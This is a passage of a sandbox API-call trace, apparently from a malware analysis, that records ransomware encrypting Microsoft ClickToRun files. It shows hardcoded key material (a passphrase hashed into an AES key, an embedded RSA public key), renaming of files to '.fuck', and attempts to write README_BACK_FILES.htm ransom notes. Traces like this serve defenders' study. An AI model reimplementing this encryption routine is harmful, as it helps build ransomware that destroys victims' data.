phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2893eb0) returned 1 [0239.095] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----6", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.095] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.095] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28831c8) returned 1 [0239.096] CryptImportPublicKeyInfo (in: hCryptProv=0x28831c8, dwCertEncodingType=0x1, pInfo=0x2897100*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2897130*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2897138*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2893cb0) returned 1 [0239.096] CryptEncrypt (in: hKey=0x2893cb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.096] CryptEncrypt (in: hKey=0x2893cb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2883250*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2883250*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.096] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2883250, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.096] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.096] CryptEncrypt (in: hKey=0x2893eb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.096] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.096] CloseHandle (hObject=0xffffffff) returned 1 [0239.096] CloseHandle (hObject=0xffffffff) returned 1 [0239.096] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.platform.x-none.man.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.platform.x-none.man.xml"), bFailIfExists=0) returned 0 [0239.097] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml", dwFileAttributes=0x0) returned 0 [0239.097] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.platform.x-none.man.xml.gsg")) returned 0 [0239.098] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.platform.x-none.man.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.platform.x-none.man.xml.fuck")) returned 0 [0239.098] CryptDestroyHash (hHash=0x2893af0) returned 1 [0239.098] CryptDestroyKey (hKey=0x2893eb0) returned 1 [0239.098] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0239.098] FindNextFileA (in: hFindFile=0x2893e70, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.098] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.099] GetLastError () returned 0x5 [0239.099] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.hash")) returned 0x20 [0239.100] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash", dwFileAttributes=0x80) returned 0 [0239.100] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.101] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.101] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash.gsg", dwFileAttributes=0x2) returned 0 [0239.102] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x287fb98) returned 1 [0239.104] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.104] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.104] CryptHashData (hHash=0x28940f0, pbData=0x2884f80, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.104] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x28940f0, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2893b70) returned 1 [0239.104] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----6", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.105] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.105] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2883608) returned 1 [0239.105] CryptImportPublicKeyInfo (in: hCryptProv=0x2883608, dwCertEncodingType=0x1, pInfo=0x28971d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2897200*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2897208*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2893ef0) returned 1 [0239.105] CryptEncrypt (in: hKey=0x2893ef0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.105] CryptEncrypt (in: hKey=0x2893ef0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285ba38*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x285ba38*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.106] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285ba38, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.106] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.106] CryptEncrypt (in: hKey=0x2893b70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.106] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.106] CloseHandle (hObject=0xffffffff) returned 1 [0239.106] CloseHandle (hObject=0xffffffff) returned 1 [0239.106] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.hash.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.hash"), bFailIfExists=0) returned 0 [0239.107] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash", dwFileAttributes=0x0) returned 0 [0239.108] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.hash.gsg")) returned 0 [0239.108] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.hash"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.hash.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.hash.fuck")) returned 0 [0239.109] CryptDestroyHash (hHash=0x28940f0) returned 1 [0239.109] CryptDestroyKey (hKey=0x2893b70) returned 1 [0239.109] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0239.109] FindNextFileA (in: hFindFile=0x2893e70, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.109] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.109] GetLastError () returned 0x5 [0239.109] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.man.dat")) returned 0x20 [0239.109] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat", dwFileAttributes=0x80) returned 0 [0239.110] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.110] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.man.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.111] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat.gsg", dwFileAttributes=0x2) returned 0 [0239.111] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x287fb98) returned 1 [0239.114] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.114] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.114] CryptHashData (hHash=0x2893af0, pbData=0x2885188, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.114] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2893af0, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28940f0) returned 1 [0239.114] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----6", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.114] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.114] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28ab2e8) returned 1 [0239.114] CryptImportPublicKeyInfo (in: hCryptProv=0x28ab2e8, dwCertEncodingType=0x1, pInfo=0x2895f20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2895f50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2895f58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2893eb0) returned 1 [0239.115] CryptEncrypt (in: hKey=0x2893eb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.115] CryptEncrypt (in: hKey=0x2893eb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28aa958*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28aa958*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.115] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28aa958, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.115] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.115] CryptEncrypt (in: hKey=0x28940f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.115] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.115] CloseHandle (hObject=0xffffffff) returned 1 [0239.115] CloseHandle (hObject=0xffffffff) returned 1 [0239.115] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.man.dat.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.man.dat"), bFailIfExists=0) returned 0 [0239.116] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat", dwFileAttributes=0x0) returned 0 [0239.116] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.man.dat.gsg")) returned 0 [0239.117] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.man.dat"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\stream.x64.x-none.man.dat.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.x64.x-none.man.dat.fuck")) returned 0 [0239.117] CryptDestroyHash (hHash=0x2893af0) returned 1 [0239.117] CryptDestroyKey (hKey=0x28940f0) returned 1 [0239.117] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0239.117] FindNextFileA (in: hFindFile=0x2893e70, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0239.117] FindClose (in: hFindFile=0x2893e70 | out: hFindFile=0x2893e70) returned 1 [0239.118] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\readme_back_files.htm")) returned 0xffffffff [0239.118] AreFileApisANSI () returned 1 [0239.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28aa628, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 126 [0239.118] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.118] GetLastError () returned 0x5 [0239.118] GetLastError () returned 0x5 [0239.119] FindNextFileA (in: hFindFile=0x2893e30, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0239.119] FindClose (in: hFindFile=0x2893e30 | out: hFindFile=0x2893e30) returned 1 [0239.119] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\readme_back_files.htm")) returned 0xffffffff [0239.119] AreFileApisANSI () returned 1 [0239.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28aaf30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 116 [0239.119] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.120] GetLastError () returned 0x5 [0239.120] GetLastError () returned 0x5 [0239.120] FindNextFileA (in: hFindFile=0x2893fb0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.120] FindClose (in: hFindFile=0x2893fb0 | out: hFindFile=0x2893fb0) returned 1 [0239.120] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\readme_back_files.htm")) returned 0xffffffff [0239.120] AreFileApisANSI () returned 1 [0239.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6bb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0239.121] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.121] GetLastError () returned 0x5 [0239.121] GetLastError () returned 0x5 [0239.121] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.121] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2893af0 [0239.122] FindNextFileA (in: hFindFile=0x2893af0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.122] FindNextFileA (in: hFindFile=0x2893af0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.122] FindClose (in: 